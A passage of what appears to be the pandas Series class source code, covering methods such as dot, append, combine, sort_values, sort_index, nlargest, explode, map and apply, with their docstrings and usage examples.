        each column of an array.
It can also be called using `self @ other` in Python >= 3.5.
Parameters
----------
other : Series, DataFrame or array-like
The other object to compute the dot product with its columns.
Returns
-------
scalar, Series or numpy.ndarray
            Return the dot product of the Series and other if other is a
            Series, a Series of the dot products between the Series and each
            column of other if other is a DataFrame, or a numpy.ndarray of the
            dot products between the Series and each column of the array.
See Also
--------
DataFrame.dot: Compute the matrix product with the DataFrame.
Series.mul: Multiplication of series and other, element-wise.
Notes
-----
        The Series and other have to share the same index if other is a Series
or a DataFrame.
Examples
--------
>>> s = pd.Series([0, 1, 2, 3])
>>> other = pd.Series([-1, 2, -3, 4])
>>> s.dot(other)
8
>>> s @ other
8
>>> df = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
>>> s.dot(df)
0 24
1 14
dtype: int64
>>> arr = np.array([[0, 1], [-2, 3], [4, -5], [6, 7]])
>>> s.dot(arr)
array([24, 14])
"""
from pandas.core.frame import DataFrame
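        # align on the union of the indexes; a union strictly larger than either
        # index means the labels do not match exactly, so refuse the product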
if isinstance(other, (Series, DataFrame)):
common = self.index.union(other.index)
if len(common) > len(self.index) or len(common) > len(other.index):
raise ValueError("matrices are not aligned")
left = self.reindex(index=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right.values
else:
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[0] != rvals.shape[0]:
raise Exception(
"Dot product shape mismatch, %s vs %s" % (lvals.shape, rvals.shape)
)
if isinstance(other, DataFrame):
return self._constructor(
np.dot(lvals, rvals), index=other.columns
).__finalize__(self)
elif isinstance(other, Series):
return np.dot(lvals, rvals)
elif isinstance(rvals, np.ndarray):
return np.dot(lvals, rvals)
else: # pragma: no cover
raise TypeError("unsupported type: %s" % type(other))
def __matmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
return self.dot(other)
def __rmatmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
return self.dot(np.transpose(other))
@Substitution(klass="Series")
@Appender(base._shared_docs["searchsorted"])
def searchsorted(self, value, side="left", sorter=None):
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
# -------------------------------------------------------------------
# Combination
def append(self, to_append, ignore_index=False, verify_integrity=False):
"""
Concatenate two or more Series.
Parameters
----------
to_append : Series or list/tuple of Series
Series to append with self.
ignore_index : bool, default False
If True, do not use the index labels.
.. versionadded:: 0.19.0
verify_integrity : bool, default False
If True, raise Exception on creating index with duplicates.
Returns
-------
Series
Concatenated Series.
See Also
--------
concat : General function to concatenate DataFrame or Series objects.
Notes
-----
Iteratively appending to a Series can be more computationally intensive
than a single concatenate. A better solution is to append values to a
list and then concatenate the list with the original Series all at
once.
Examples
--------
>>> s1 = pd.Series([1, 2, 3])
>>> s2 = pd.Series([4, 5, 6])
>>> s3 = pd.Series([4, 5, 6], index=[3, 4, 5])
>>> s1.append(s2)
0 1
1 2
2 3
0 4
1 5
2 6
dtype: int64
>>> s1.append(s3)
0 1
1 2
2 3
3 4
4 5
5 6
dtype: int64
With `ignore_index` set to True:
>>> s1.append(s2, ignore_index=True)
0 1
1 2
2 3
3 4
4 5
5 6
dtype: int64
With `verify_integrity` set to True:
>>> s1.append(s2, verify_integrity=True)
Traceback (most recent call last):
...
ValueError: Indexes have overlapping values: [0, 1, 2]
"""
from pandas.core.reshape.concat import concat
if isinstance(to_append, (list, tuple)):
            # list + tuple raises TypeError, so extend a fresh list instead
            to_concat = [self]
            to_concat.extend(to_append)
else:
to_concat = [self, to_append]
return concat(
to_concat, ignore_index=ignore_index, verify_integrity=verify_integrity
)
def _binop(self, other, func, level=None, fill_value=None):
"""
Perform generic binary operation with optional fill value.
Parameters
----------
other : Series
func : binary operator
fill_value : float or object
Value to substitute for NA/null values. If both Series are NA in a
location, the result will be NA regardless of the passed fill value
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level
Returns
-------
Series
"""
if not isinstance(other, Series):
raise AssertionError("Other operand must be Series")
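        # outer-align both Series so the operation is applied label-wise;
        # one-sided gaps are filled with ``fill_value`` by fill_binop below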
new_index = self.index
this = self
if not self.index.equals(other.index):
this, other = self.align(other, level=level, join="outer", copy=False)
new_index = this.index
this_vals, other_vals = ops.fill_binop(this.values, other.values, fill_value)
with np.errstate(all="ignore"):
result = func(this_vals, other_vals)
name = ops.get_op_result_name(self, other)
if func.__name__ in ["divmod", "rdivmod"]:
ret = ops._construct_divmod_result(self, result, new_index, name)
else:
ret = ops._construct_result(self, result, new_index, name)
return ret
def combine(self, other, func, fill_value=None):
"""
Combine the Series with a Series or scalar according to `func`.
Combine the Series and `other` using `func` to perform elementwise
selection for combined Series.
`fill_value` is assumed when value is missing at some index
from one of the two objects being combined.
Parameters
----------
other : Series or scalar
The value(s) to be combined with the `Series`.
func : function
Function that takes two scalars as inputs and returns an element.
fill_value : scalar, optional
The value to assume when an index is missing from
one Series or the other. The default specifies to use the
appropriate NaN value for the underlying dtype of the Series.
Returns
-------
Series
The result of combining the Series with the other object.
See Also
--------
Series.combine_first : Combine Series values, choosing the calling
Series' values first.
Examples
--------
        Consider two datasets ``s1`` and ``s2`` containing
highest clocked speeds of different birds.
>>> s1 = pd.Series({'falcon': 330.0, 'eagle': 160.0})
>>> s1
falcon 330.0
eagle 160.0
dtype: float64
>>> s2 = pd.Series({'falcon': 345.0, 'eagle': 200.0, 'duck': 30.0})
>>> s2
falcon 345.0
eagle 200.0
duck 30.0
dtype: float64
Now, to combine the two datasets and view the highest speeds
of the birds across the two datasets
>>> s1.combine(s2, max)
duck NaN
eagle 200.0
falcon 345.0
dtype: float64
        In the previous example, the resulting value for duck is missing,
        because the maximum of a NaN and a float is a NaN.
        Setting ``fill_value=0`` substitutes 0 for the missing entry, so the
        maximum value returned always comes from one of the datasets.
>>> s1.combine(s2, max, fill_value=0)
duck 30.0
eagle 200.0
falcon 345.0
dtype: float64
"""
if fill_value is None:
fill_value = na_value_for_dtype(self.dtype, compat=False)
if isinstance(other, Series):
# If other is a Series, result is based on union of Series,
# so do this element by element
new_index = self.index.union(other.index)
new_name = ops.get_op_result_name(self, other)
new_values = []
for idx in new_index:
lv = self.get(idx, fill_value)
rv = other.get(idx, fill_value)
with np.errstate(all="ignore"):
new_values.append(func(lv, rv))
else:
# Assume that other is a scalar, so apply the function for
# each element in the Series
new_index = self.index
with np.errstate(all="ignore"):
new_values = [func(lv, other) for lv in self._values]
new_name = self.name
if is_categorical_dtype(self.values):
pass
elif is_extension_array_dtype(self.values):
# The function can return something of any type, so check
# if the type is compatible with the calling EA.
try:
new_values = self._values._from_sequence(new_values)
except Exception:
# https://github.com/pandas-dev/pandas/issues/22850
# pandas has no control over what 3rd-party ExtensionArrays
# do in _values_from_sequence. We still want ops to work
# though, so we catch any regular Exception.
pass
return self._constructor(new_values, index=new_index, name=new_name)
def combine_first(self, other):
"""
Combine Series values, choosing the calling Series's values first.
Parameters
----------
other : Series
The value(s) to be combined with the `Series`.
Returns
-------
Series
The result of combining the Series with the other object.
See Also
--------
Series.combine : Perform elementwise operation on two Series
using a given function.
Notes
-----
Result index will be the union of the two indexes.
Examples
--------
>>> s1 = pd.Series([1, np.nan])
>>> s2 = pd.Series([3, 4])
>>> s1.combine_first(s2)
0 1.0
1 4.0
dtype: float64
"""
new_index = self.index.union(other.index)
this = self.reindex(new_index, copy=False)
other = other.reindex(new_index, copy=False)
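        # if this Series is datetime-like but ``other`` is not, coerce ``other``
        # so the two sides are combined on a comparable dtype (assumed intent)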
if is_datetimelike(this) and not is_datetimelike(other):
other = to_datetime(other)
return this.where(notna(this), other)
def update(self, other):
"""
Modify Series in place using non-NA values from passed
Series. Aligns on index.
Parameters
----------
other : Series
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s.update(pd.Series([4, 5, 6]))
>>> s
0 4
1 5
2 6
dtype: int64
>>> s = pd.Series(['a', 'b', 'c'])
>>> s.update(pd.Series(['d', 'e'], index=[0, 2]))
>>> s
0 d
1 b
2 e
dtype: object
>>> s = pd.Series([1, 2, 3])
>>> s.update(pd.Series([4, 5, 6, 7, 8]))
>>> s
0 4
1 5
2 6
dtype: int64
If ``other`` contains NaNs the corresponding values are not updated
in the original Series.
>>> s = pd.Series([1, 2, 3])
>>> s.update(pd.Series([4, np.nan, 6]))
>>> s
0 4
1 2
2 6
dtype: int64
"""
other = other.reindex_like(self)
mask = notna(other)
self._data = self._data.putmask(mask=mask, new=other, inplace=True)
self._maybe_update_cacher()
# ----------------------------------------------------------------------
# Reindexing, sorting
def sort_values(
self,
axis=0,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
):
"""
Sort by the values.
Sort a Series in ascending or descending order by some
criterion.
Parameters
----------
axis : {0 or 'index'}, default 0
Axis to direct sorting. The value 'index' is accepted for
compatibility with DataFrame.sort_values.
ascending : bool, default True
If True, sort values in ascending order, otherwise descending.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort' or 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also :func:`numpy.sort` for more
information. 'mergesort' is the only stable algorithm.
na_position : {'first' or 'last'}, default 'last'
Argument 'first' puts NaNs at the beginning, 'last' puts NaNs at
the end.
Returns
-------
Series
Series ordered by values.
See Also
--------
Series.sort_index : Sort by the Series indices.
DataFrame.sort_values : Sort DataFrame by the values along either axis.
DataFrame.sort_index : Sort DataFrame by indices.
Examples
--------
>>> s = pd.Series([np.nan, 1, 3, 10, 5])
>>> s
0 NaN
1 1.0
2 3.0
3 10.0
4 5.0
dtype: float64
Sort values ascending order (default behaviour)
>>> s.sort_values(ascending=True)
1 1.0
2 3.0
4 5.0
3 10.0
0 NaN
dtype: float64
Sort values descending order
>>> s.sort_values(ascending=False)
3 10.0
4 5.0
2 3.0
1 1.0
0 NaN
dtype: float64
Sort values inplace
>>> s.sort_values(ascending=False, inplace=True)
>>> s
3 10.0
4 5.0
2 3.0
1 1.0
0 NaN
dtype: float64
Sort values putting NAs first
>>> s.sort_values(na_position='first')
0 NaN
1 1.0
2 3.0
4 5.0
3 10.0
dtype: float64
Sort a series of strings
>>> s = pd.Series(['z', 'b', 'd', 'a', 'c'])
>>> s
0 z
1 b
2 d
3 a
4 c
dtype: object
>>> s.sort_values()
3 a
1 b
4 c
2 d
0 z
dtype: object
"""
inplace = validate_bool_kwarg(inplace, "inplace")
# Validate the axis parameter
self._get_axis_number(axis)
# GH 5856/5853
if inplace and self._is_cached:
raise ValueError(
"This Series is a view of some other array, to "
"sort in-place you must create a copy"
)
def _try_kind_sort(arr):
# easier to ask forgiveness than permission
try:
# if kind==mergesort, it can fail for object dtype
return arr.argsort(kind=kind)
except TypeError:
# stable sort not available for object dtype
# uses the argsort default quicksort
return arr.argsort(kind="quicksort")
arr = self._values
sortedIdx = np.empty(len(self), dtype=np.int32)
bad = isna(arr)
good = ~bad
idx = ibase.default_index(len(self))
argsorted = _try_kind_sort(arr[good])
if is_list_like(ascending):
if len(ascending) != 1:
raise ValueError(
"Length of ascending (%d) must be 1 "
"for Series" % (len(ascending))
)
ascending = ascending[0]
if not is_bool(ascending):
raise ValueError("ascending must be boolean")
if not ascending:
argsorted = argsorted[::-1]
if na_position == "last":
n = good.sum()
sortedIdx[:n] = idx[good][argsorted]
sortedIdx[n:] = idx[bad]
elif na_position == "first":
n = bad.sum()
sortedIdx[n:] = idx[good][argsorted]
sortedIdx[:n] = idx[bad]
else:
raise ValueError("invalid na_position: {!r}".format(na_position))
result = self._constructor(arr[sortedIdx], index=self.index[sortedIdx])
if inplace:
self._update_inplace(result)
else:
return result.__finalize__(self)
def sort_index(
self,
axis=0,
level=None,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
sort_remaining=True,
):
"""
Sort Series by index labels.
Returns a new Series sorted by label if `inplace` argument is
``False``, otherwise updates the original series and returns None.
Parameters
----------
axis : int, default 0
Axis to direct sorting. This can only be 0 for Series.
level : int, optional
If not None, sort on values in specified index level(s).
        ascending : bool, default True
Sort ascending vs. descending.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also :func:`numpy.sort` for more
information. 'mergesort' is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
If 'first' puts NaNs at the beginning, 'last' puts NaNs at the end.
Not implemented for MultiIndex.
sort_remaining : bool, default True
If True and sorting by level and index is multilevel, sort by other
levels too (in order) after sorting by specified level.
Returns
-------
Series
The original Series sorted by the labels.
See Also
--------
DataFrame.sort_index: Sort DataFrame by the index.
DataFrame.sort_values: Sort DataFrame by the value.
Series.sort_values : Sort Series by the value.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c', 'd'], index=[3, 2, 1, 4])
>>> s.sort_index()
1 c
2 b
3 a
4 d
dtype: object
Sort Descending
>>> s.sort_index(ascending=False)
4 d
3 a
2 b
1 c
dtype: object
Sort Inplace
>>> s.sort_index(inplace=True)
>>> s
1 c
2 b
3 a
4 d
dtype: object
By default NaNs are put at the end, but use `na_position` to place
them at the beginning
>>> s = pd.Series(['a', 'b', 'c', 'd'], index=[3, 2, 1, np.nan])
>>> s.sort_index(na_position='first')
NaN d
1.0 c
2.0 b
3.0 a
dtype: object
Specify index level to sort
>>> arrays = [np.array(['qux', 'qux', 'foo', 'foo',
... 'baz', 'baz', 'bar', 'bar']),
... np.array(['two', 'one', 'two', 'one',
... 'two', 'one', 'two', 'one'])]
>>> s = pd.Series([1, 2, 3, 4, 5, 6, 7, 8], index=arrays)
>>> s.sort_index(level=1)
bar one 8
baz one 6
foo one 4
qux one 2
bar two 7
baz two 5
foo two 3
qux two 1
dtype: int64
Does not sort by remaining levels when sorting by levels
>>> s.sort_index(level=1, sort_remaining=False)
qux one 2
foo one 4
baz one 6
bar one 8
qux two 1
foo two 3
baz two 5
bar two 7
dtype: int64
"""
# TODO: this can be combined with DataFrame.sort_index impl as
# almost identical
inplace = validate_bool_kwarg(inplace, "inplace")
# Validate the axis parameter
self._get_axis_number(axis)
index = self.index
if level is not None:
new_index, indexer = index.sortlevel(
level, ascending=ascending, sort_remaining=sort_remaining
)
elif isinstance(index, MultiIndex):
from pandas.core.sorting import lexsort_indexer
labels = index._sort_levels_monotonic()
indexer = lexsort_indexer(
labels._get_codes_for_sorting(),
orders=ascending,
na_position=na_position,
)
else:
from pandas.core.sorting import nargsort
# Check monotonic-ness before sort an index
# GH11080
if (ascending and index.is_monotonic_increasing) or (
not ascending and index.is_monotonic_decreasing
):
if inplace:
return
else:
return self.copy()
indexer = nargsort(
index, kind=kind, ascending=ascending, na_position=na_position
)
indexer = ensure_platform_int(indexer)
new_index = index.take(indexer)
new_index = new_index._sort_levels_monotonic()
new_values = self._values.take(indexer)
result = self._constructor(new_values, index=new_index)
if inplace:
self._update_inplace(result)
else:
return result.__finalize__(self)
def argsort(self, axis=0, kind="quicksort", order=None):
"""
Override ndarray.argsort. Argsorts the value, omitting NA/null values,
and places the result in the same locations as the non-NA values.
Parameters
----------
axis : int
Has no effect but is accepted for compatibility with numpy.
kind : {'mergesort', 'quicksort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See np.sort for more
            information. 'mergesort' is the only stable algorithm.
order : None
Has no effect but is accepted for compatibility with numpy.
Returns
-------
Series
Positions of values within the sort order with -1 indicating
nan values.
See Also
--------
numpy.ndarray.argsort
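        Examples
        --------
        With no missing values, the result simply holds the argsort positions:
        >>> pd.Series([3, 1, 2]).argsort()
        0    1
        1    2
        2    0
        dtype: int64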
"""
values = self._values
mask = isna(values)
if mask.any():
result = Series(-1, index=self.index, name=self.name, dtype="int64")
notmask = ~mask
result[notmask] = np.argsort(values[notmask], kind=kind)
return self._constructor(result, index=self.index).__finalize__(self)
else:
return self._constructor(
np.argsort(values, kind=kind), index=self.index, dtype="int64"
).__finalize__(self)
def nlargest(self, n=5, keep="first"):
"""
Return the largest `n` elements.
Parameters
----------
n : int, default 5
Return this many descending sorted values.
keep : {'first', 'last', 'all'}, default 'first'
When there are duplicate values that cannot all fit in a
Series of `n` elements:
- ``first`` : return the first `n` occurrences in order
of appearance.
- ``last`` : return the last `n` occurrences in reverse
order of appearance.
- ``all`` : keep all occurrences. This can result in a Series of
size larger than `n`.
Returns
-------
Series
The `n` largest values in the Series, sorted in decreasing order.
See Also
--------
Series.nsmallest: Get the `n` smallest elements.
Series.sort_values: Sort Series by values.
Series.head: Return the first `n` rows.
Notes
-----
Faster than ``.sort_values(ascending=False).head(n)`` for small `n`
relative to the size of the ``Series`` object.
Examples
--------
>>> countries_population = {"Italy": 59000000, "France": 65000000,
... "Malta": 434000, "Maldives": 434000,
... "Brunei": 434000, "Iceland": 337000,
... "Nauru": 11300, "Tuvalu": 11300,
... "Anguilla": 11300, "Monserat": 5200}
>>> s = pd.Series(countries_population)
>>> s
Italy 59000000
France 65000000
Malta 434000
Maldives 434000
Brunei 434000
Iceland 337000
Nauru 11300
Tuvalu 11300
Anguilla 11300
Monserat 5200
dtype: int64
The `n` largest elements where ``n=5`` by default.
>>> s.nlargest()
France 65000000
Italy 59000000
Malta 434000
Maldives 434000
Brunei 434000
dtype: int64
The `n` largest elements where ``n=3``. Default `keep` value is 'first'
so Malta will be kept.
>>> s.nlargest(3)
France 65000000
Italy 59000000
Malta 434000
dtype: int64
The `n` largest elements where ``n=3`` and keeping the last duplicates.
Brunei will be kept since it is the last with value 434000 based on
the index order.
>>> s.nlargest(3, keep='last')
France 65000000
Italy 59000000
Brunei 434000
dtype: int64
The `n` largest elements where ``n=3`` with all duplicates kept. Note
that the returned Series has five elements due to the three duplicates.
>>> s.nlargest(3, keep='all')
France 65000000
Italy 59000000
Malta 434000
Maldives 434000
Brunei 434000
dtype: int64
"""
return algorithms.SelectNSeries(self, n=n, keep=keep).nlargest()
def nsmallest(self, n=5, keep="first"):
"""
Return the smallest `n` elements.
Parameters
----------
n : int, default 5
Return this many ascending sorted values.
keep : {'first', 'last', 'all'}, default 'first'
When there are duplicate values that cannot all fit in a
Series of `n` elements:
- ``first`` : return the first `n` occurrences in order
of appearance.
- ``last`` : return the last `n` occurrences in reverse
order of appearance.
- ``all`` : keep all occurrences. This can result in a Series of
size larger than `n`.
Returns
-------
Series
The `n` smallest values in the Series, sorted in increasing order.
See Also
--------
Series.nlargest: Get the `n` largest elements.
Series.sort_values: Sort Series by values.
Series.head: Return the first `n` rows.
Notes
-----
Faster than ``.sort_values().head(n)`` for small `n` relative to
the size of the ``Series`` object.
Examples
--------
>>> countries_population = {"Italy": 59000000, "France": 65000000,
... "Brunei": 434000, "Malta": 434000,
... "Maldives": 434000, "Iceland": 337000,
... "Nauru": 11300, "Tuvalu": 11300,
... "Anguilla": 11300, "Monserat": 5200}
>>> s = pd.Series(countries_population)
>>> s
Italy 59000000
France 65000000
Brunei 434000
Malta 434000
Maldives 434000
Iceland 337000
Nauru 11300
Tuvalu 11300
Anguilla 11300
Monserat 5200
dtype: int64
The `n` smallest elements where ``n=5`` by default.
>>> s.nsmallest()
Monserat 5200
Nauru 11300
Tuvalu 11300
Anguilla 11300
Iceland 337000
dtype: int64
The `n` smallest elements where ``n=3``. Default `keep` value is
'first' so Nauru and Tuvalu will be kept.
>>> s.nsmallest(3)
Monserat 5200
Nauru 11300
Tuvalu 11300
dtype: int64
The `n` smallest elements where ``n=3`` and keeping the last
duplicates. Anguilla and Tuvalu will be kept since they are the last
with value 11300 based on the index order.
>>> s.nsmallest(3, keep='last')
Monserat 5200
Anguilla 11300
Tuvalu 11300
dtype: int64
The `n` smallest elements where ``n=3`` with all duplicates kept. Note
that the returned Series has four elements due to the three duplicates.
>>> s.nsmallest(3, keep='all')
Monserat 5200
Nauru 11300
Tuvalu 11300
Anguilla 11300
dtype: int64
"""
return algorithms.SelectNSeries(self, n=n, keep=keep).nsmallest()
def swaplevel(self, i=-2, j=-1, copy=True):
"""
Swap levels i and j in a MultiIndex.
Parameters
----------
i, j : int, str (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
Series
Series with levels swapped in MultiIndex.
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
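        Examples
        --------
        By default the two innermost levels are exchanged (only the resulting
        level names are shown here):
        >>> mi = pd.MultiIndex.from_tuples([('a', 'one'), ('b', 'two')],
        ...                                names=['x', 'y'])
        >>> s = pd.Series([1, 2], index=mi)
        >>> s.swaplevel().index.names
        FrozenList(['y', 'x'])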
"""
new_index = self.index.swaplevel(i, j)
return self._constructor(self._values, index=new_index, copy=copy).__finalize__(
self
)
def reorder_levels(self, order):
"""
Rearrange index levels using input order.
May not drop or duplicate levels.
Parameters
----------
order : list of int representing new level order
(reference level by number or key)
Returns
-------
type of caller (new object)
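        Examples
        --------
        Only the resulting level names are shown here:
        >>> mi = pd.MultiIndex.from_tuples([('a', 'one'), ('b', 'two')],
        ...                                names=['x', 'y'])
        >>> s = pd.Series([1, 2], index=mi)
        >>> s.reorder_levels(['y', 'x']).index.names
        FrozenList(['y', 'x'])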
"""
if not isinstance(self.index, MultiIndex): # pragma: no cover
raise Exception("Can only reorder levels on a hierarchical axis.")
result = self.copy()
result.index = result.index.reorder_levels(order)
return result
def explode(self) -> "Series":
"""
Transform each element of a list-like to a row, replicating the
index values.
.. versionadded:: 0.25.0
Returns
-------
Series
Exploded lists to rows; index will be duplicated for these rows.
See Also
--------
Series.str.split : Split string values on specified separator.
Series.unstack : Unstack, a.k.a. pivot, Series with MultiIndex
to produce DataFrame.
DataFrame.melt : Unpivot a DataFrame from wide format to long format
DataFrame.explode : Explode a DataFrame from list-like
columns to long format.
Notes
-----
This routine will explode list-likes including lists, tuples,
Series, and np.ndarray. The result dtype of the subset rows will
be object. Scalars will be returned unchanged. Empty list-likes will
result in a np.nan for that row.
Examples
--------
>>> s = pd.Series([[1, 2, 3], 'foo', [], [3, 4]])
>>> s
0 [1, 2, 3]
1 foo
2 []
3 [3, 4]
dtype: object
>>> s.explode()
0 1
0 2
0 3
1 foo
2 NaN
3 3
3 4
dtype: object
"""
if not len(self) or not is_object_dtype(self):
return self.copy()
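        # reshape.explode flattens the list-likes and reports how many elements
        # each row produced, so the original index can be repeated to match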
values, counts = reshape.explode(np.asarray(self.array))
result = Series(values, index=self.index.repeat(counts), name=self.name)
return result
def unstack(self, level=-1, fill_value=None):
"""
Unstack, a.k.a. pivot, Series with MultiIndex to produce DataFrame.
The level involved will automatically get sorted.
Parameters
----------
level : int, str, or list of these, default last level
Level(s) to unstack, can pass level name.
fill_value : scalar value, default None
Value to use when replacing NaN values.
.. versionadded:: 0.18.0
Returns
-------
DataFrame
Unstacked Series.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4],
... index=pd.MultiIndex.from_product([['one', 'two'],
... ['a', 'b']]))
>>> s
one a 1
b 2
two a 3
b 4
dtype: int64
>>> s.unstack(level=-1)
a b
one 1 2
two 3 4
>>> s.unstack(level=0)
one two
a 1 3
b 2 4
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
# ----------------------------------------------------------------------
# function application
def map(self, arg, na_action=None):
"""
Map values of Series according to input correspondence.
Used for substituting each value in a Series with another value,
that may be derived from a function, a ``dict`` or
a :class:`Series`.
Parameters
----------
arg : function, dict, or Series
Mapping correspondence.
na_action : {None, 'ignore'}, default None
If 'ignore', propagate NaN values, without passing them to the
mapping correspondence.
Returns
-------
Series
Same index as caller.
See Also
--------
Series.apply : For applying more complex functions on a Series.
DataFrame.apply : Apply a function row-/column-wise.
DataFrame.applymap : Apply a function elementwise on a whole DataFrame.
Notes
-----
When ``arg`` is a dictionary, values in Series that are not in the
dictionary (as keys) are converted to ``NaN``. However, if the
dictionary is a ``dict`` subclass that defines ``__missing__`` (i.e.
provides a method for default values), then this default is used
rather than ``NaN``.
Examples
--------
>>> s = pd.Series(['cat', 'dog', np.nan, 'rabbit'])
>>> s
0 cat
1 dog
2 NaN
3 rabbit
dtype: object
``map`` accepts a ``dict`` or a ``Series``. Values that are not found
in the ``dict`` are converted to ``NaN``, unless the dict has a default
value (e.g. ``defaultdict``):
>>> s.map({'cat': 'kitten', 'dog': 'puppy'})
0 kitten
1 puppy
2 NaN
3 NaN
dtype: object
It also accepts a function:
>>> s.map('I am a {}'.format)
0 I am a cat
1 I am a dog
2 I am a nan
3 I am a rabbit
dtype: object
To avoid applying the function to missing values (and keep them as
``NaN``) ``na_action='ignore'`` can be used:
>>> s.map('I am a {}'.format, na_action='ignore')
0 I am a cat
1 I am a dog
2 NaN
3 I am a rabbit
dtype: object
"""
new_values = super()._map_values(arg, na_action=na_action)
return self._constructor(new_values, index=self.index).__finalize__(self)
def _gotitem(self, key, ndim, subset=None):
"""
Sub-classes to define. Return a sliced object.
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
return self
_agg_see_also_doc = dedent(
"""
See Also
--------
Series.apply : Invoke function on a Series.
Series.transform : Transform function producing a Series with like indexes.
"""
)
_agg_examples_doc = dedent(
"""
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.agg('min')
1
>>> s.agg(['min', 'max'])
min 1
max 4
dtype: int64
"""
)
@Substitution(
see_also=_agg_see_also_doc,
examples=_agg_examples_doc,
versionadded="\n.. versionadded:: 0.20.0\n",
**_shared_doc_kwargs
)
@Appender(generic._shared_docs["aggregate"])
def aggregate(self, func, axis=0, *args, **kwargs):
# Validate the axis parameter
self._get_axis_number(axis)
result, how = self._aggregate(func, *args, **kwargs)
if result is None:
# we can be called from an inner function which
# passes this meta-data
kwargs.pop("_axis", None)
kwargs.pop("_level", None)
# try a regular apply, this evaluates lambdas
# row-by-row; however if the lambda is expected a Series
# expression, e.g.: lambda x: x-x.quantile(0.25)
# this will fail, so we can try a vectorized evaluation
# we cannot FIRST try the vectorized evaluation, because
# then .agg and .apply would have different semantics if the
# operation is actually defined on the Series, e.g. str
try:
result = self.apply(func, *args, **kwargs)
except (ValueError, AttributeError, TypeError):
result = func(self, *args, **kwargs)
return result
agg = aggregate
@Appender(generic._shared_docs["transform"] % _shared_doc_kwargs)
def transform(self, func, axis=0, *args, **kwargs):
# Validate the axis parameter
self._get_axis_number(axis)
return super().transform(func, *args, **kwargs)
def apply(self, func, convert_dtype=True, args=(), **kwds):
"""
Invoke function on values of Series.
Can be ufunc (a NumPy function that applies to the entire Series)
or a Python function that only works on single values.
Parameters
----------
func : function
Python function or NumPy ufunc to apply.
convert_dtype : bool, default True
Try to find better dtype for elementwise function results. If
False, leave as dtype=object.
args : tuple
Positional arguments passed to func after the series value.
**kwds
Additional keyword arguments passed to func.
Returns
-------
Series or DataFrame
If func returns a Series object the result will be a DataFrame.
See Also
--------
Series.map: For element-wise operations.
Series.agg: Only perform aggregating type operations.
Series.transform: Only perform transforming type operations.
Examples
--------
Create a series with typical summer temperatures for each city.
>>> s = pd.Series([20, 21, 12],
... index=['London', 'New York', 'Helsinki'])
>>> s
London 20
New York 21
Helsinki 12
dtype: int64
Square the values by defining a function and passing it as an
argument to ``apply()``.
>>> def square(x):
... return x ** 2
>>> s.apply(square)
London 400
New York 441
Helsinki 144
dtype: int64
Square the values by passing an anonymous function as an
argument to ``apply()``.
>>> s.apply(lambda x: x ** 2)
London 400
New York 441
Helsinki 144
dtype: int64
Define a custom function that needs additional positional
arguments and pass these additional arguments using the
``args`` keyword.
>>> def subtract_custom_value(x, custom_value):
... return x - custom_value
>>> s.apply(subtract_custom_value, args=(5,))
London 15
New York 16
Helsinki 7
dtype: int64
Define a custom function that takes keyword arguments
and pass these arguments to ``apply``.
>>> def add_custom_values(x, **kwargs):
... for month in kwargs:
... x += kwargs[month]
... return x
>>> s.apply(add_custom_values, june=30, july=20, august=25)
London 95
New York 96
Helsinki 87
dtype: int64
Use a function from the Numpy library.
>>> s.apply(np.log)
London 2.995732
New York 3.044522
Helsinki 2.484907
dtype: float64
"""
if len(self) == 0:
return self._constructor(dtype=self.dtype, index=self.index).__finalize__(
self
)
# dispatch to agg
if isinstance(func, (list, dict)):
return self.aggregate(func, *args, **kwds)
# if we are a string, try to dispatch
if isinstance(func, str):
return self._try_aggregate_string_function(func, *args, **kwds)
# handle ufuncs and lambdas
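        # wrap ``func`` when extra args/kwargs need forwarding on each call;
        # plain ufuncs are applied to the Series as a whole further below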
if kwds or args and not isinstance(func, np.ufunc):
def f(x):
return func(x, *args, **kwds)
else:
f = func
with np.errstate(all="ignore"):
if isinstance(f, np.ufunc):
return f(self)
# row-wise access
if is_extension_type(self.dtype):
mapped = self._values.map(f)
else:
values = self.astype(object).values
mapped = lib.map_infer(values, f, convert=convert_dtype)
if len(mapped) and isinstance(mapped[0], Series):
# GH 25959 use pd.array instead of tolist
# so extension arrays can be used
return self._constructor_expanddim(pd.array(mapped), index=self.index)
else:
return self._constructor(mapped, index=self.index).__finalize__(self)
def _reduce(
self, op, name, axis=0, skipna=True, numeric_only=None, filter_type=None, **kwds
):
"""
Perform a reduction operation.
If we have an ndarray as a value, then simply perform the operation,
otherwise delegate to the object.
"""
delegate = self._values
if axis is not None:
self._get_axis_number(axis)
if isinstance(delegate, Categorical):
# TODO deprecate numeric_only argument for Categorical and use
# skipna as well, see GH25303
return delegate._reduce(name, numeric_only=numeric_only, **kwds)
elif isinstance(delegate, ExtensionArray):
# dispatch to ExtensionArray interface
return delegate._reduce(name, skipna=skipna, **kwds)
elif is_datetime64_dtype(delegate):
# use DatetimeIndex implementation to handle skipna correctly
delegate = DatetimeIndex(delegate)
elif is_timedelta64_dtype(delegate) and hasattr(TimedeltaIndex, name):
# use TimedeltaIndex to handle skipna correctly
